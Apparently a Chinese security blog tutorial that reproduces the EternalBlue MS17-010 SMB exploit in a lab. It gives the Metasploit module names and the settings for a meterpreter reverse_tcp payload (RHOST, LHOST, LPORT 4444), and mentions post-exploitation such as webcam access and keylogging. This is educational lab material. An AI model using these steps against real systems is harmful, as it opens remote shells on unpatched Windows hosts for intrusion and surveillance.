<>永恒之蓝 MS17-010漏洞复现
文章目录
* 永恒之蓝 MS17-010漏洞复现
<https://blog.csdn.net/qq_41880069/article/details/82908131#_MS17010_0>
* 一:漏洞原理 <https://blog.csdn.net/qq_41880069/article/details/82908131#_3>
* 1:简介 <https://blog.csdn.net/qq_41880069/article/details/82908131#1_4>
* 2:漏洞原理代码详解 <https://blog.csdn.net/qq_41880069/article/details/82908131#2_7>
* 二:漏洞复现 <https://blog.csdn.net/qq_41880069/article/details/82908131#_11>
* 1:信息收集 <https://blog.csdn.net/qq_41880069/article/details/82908131#1_12>
* 2:尝试攻击 <https://blog.csdn.net/qq_41880069/article/details/82908131#2_27>
* 1>:查看漏洞模块——search ms17-010
<https://blog.csdn.net/qq_41880069/article/details/82908131#1search_ms17010_28>
* 2>:可以先使用辅助扫描模块测试 use auxiliary/scanner/smb/smb_ms17_010
<https://blog.csdn.net/qq_41880069/article/details/82908131#2_use__auxiliaryscannersmbsmb_ms17_010_31>
* 3>:使用攻击模块进行攻击 use exploit/windows/smb/ms17_010_eternalblue
<https://blog.csdn.net/qq_41880069/article/details/82908131#3_use_exploitwindowssmbms17_010_eternalblue_34>
版权声明:本文为博主原创文章,欢迎转载,请注明出处:
https://blog.csdn.net/qq_41880069/article/details/82908131
<https://blog.csdn.net/qq_41880069/article/details/82908131>
<>一:漏洞原理
<>1:简介
* 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
* 注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无,SMB服务详解:点击查看
<https://www.cnblogs.com/aisa/p/8624720.html>
<>2:漏洞原理代码详解
下面两篇文章从实际代码详细分析了漏洞原理,想要从代码详细理解该漏洞的同学可以点击查看
* http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772
<http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772>
* https://blog.csdn.net/qq_27446553/article/details/73480807
<https://blog.csdn.net/qq_27446553/article/details/73480807>
<>二:漏洞复现
<>1:信息收集
信息收集的两种方法:
* 使用msf的扫描模块,通过search scanner可以查看大量的扫描模块,这里通过search portscan命令查看端口扫描器列表,输入use
模块名,即可使用该模块
例:这里使用syn扫描模块为例
可以看到这里扫描的结果显示目标记器0-500的端口内开了135,139,445端口。而永恒之蓝利用的就是445端口 smb服务 操作系统溢出漏洞
* 使用nmap扫描
在msf也可以使用nmap进行扫描进行信息收集,示例如下:
①:扫描版本服务
若扫描出来有可能存在的漏洞的服务,可以search 该服务,查看可以利用的攻击模块
这里从收集信息来看目标主机445端口开放,可以尝试使用ms17-010(永恒之蓝)来攻击
<>2:尝试攻击
<>1>:查看漏洞模块——search ms17-010
可以看到有auxiliary(辅助)模块和exploit(攻击)模块
<>2>:可以先使用辅助扫描模块测试 use auxiliary/scanner/smb/smb_ms17_010
扫描结果显示该主机很容易受到ms17-010的攻击
<>3>:使用攻击模块进行攻击 use exploit/windows/smb/ms17_010_eternalblue
选择攻击模块时注意选择合适的版本,有些版本使用于win8以上
* set payload :设置payload,这里用set payload windows/x64/meterpreter/reverse_tcp
要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload
* show options :使用该命令会列出使用当前模块所需呀配置的参数
* set RHOST 目标主机地址 :该命令会设置好要攻击的目标主机地址
* set LHOST 攻击机地址 :该命令设置攻击机的地址,使目标主机回连至攻击机
* set LPORT 回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444
* run:开始攻击
攻击成功后攻击机和目标主机之间会建立一个连接,得到一个meterpreter会话
上面已经对攻击的信息做了标注,这里进行解释:
* ①:表示永恒之蓝覆盖成功完成
* ②:目标主机和攻击机建立了了一个shell连接,会话为session 1
* ③:得到一个meterpreter会话,尝试获取shell失败
* ④:在meterpreter会话下输入ps就能获得目标主机的当前进程
注:
meterpreter是metasploit框架中的一个扩展模块,是后渗透攻击中的杀手锏,使用meterpreter作为攻击载荷,建立连接后可以对目标系统进行更深入的渗透,在本次连接建立后,我单独写了一篇后渗透攻击的博客,大家可以跳转续看:
https://blog.csdn.net/qq_41880069/article/details/82908293
<https://blog.csdn.net/qq_41880069/article/details/82908293>
点击这里直接在当前网页跳转至该博客 <https://blog.csdn.net/qq_41880069/article/details/82908293>
到这里漏洞攻击已经成功,接下来要做的就是后渗透攻击,涉及到权限提升,跳板攻击,密码哈希值获取,获取shell以及其他更多信息
后渗透测试中会有很多好玩的指令操作,如打开摄像头,记录键盘输入,进入目标主机目录等等,欢迎大家访问 点击这里查看:后渗透测试攻击详解
<https://blog.csdn.net/qq_41880069/article/details/%5B%E7%82%B9%E5%87%BB%E8%BF%99%E9%87%8C%E5%9C%A8%E5%BD%93%E5%89%8D%E7%BD%91%E9%A1%B5%E8%B7%B3%E8%BD%AC%5D%28https://blog.csdn.net/qq_41880069/article/details/82908293%29>
,欢迎大家关注博主,相互交流,共同进步,谢谢。
版权声明:本文为博主原创文章,转载请注明出处:
https://blog.csdn.net/qq_41880069/article/details/82908131
<https://blog.csdn.net/qq_41880069/article/details/82908131>
热门工具 换一换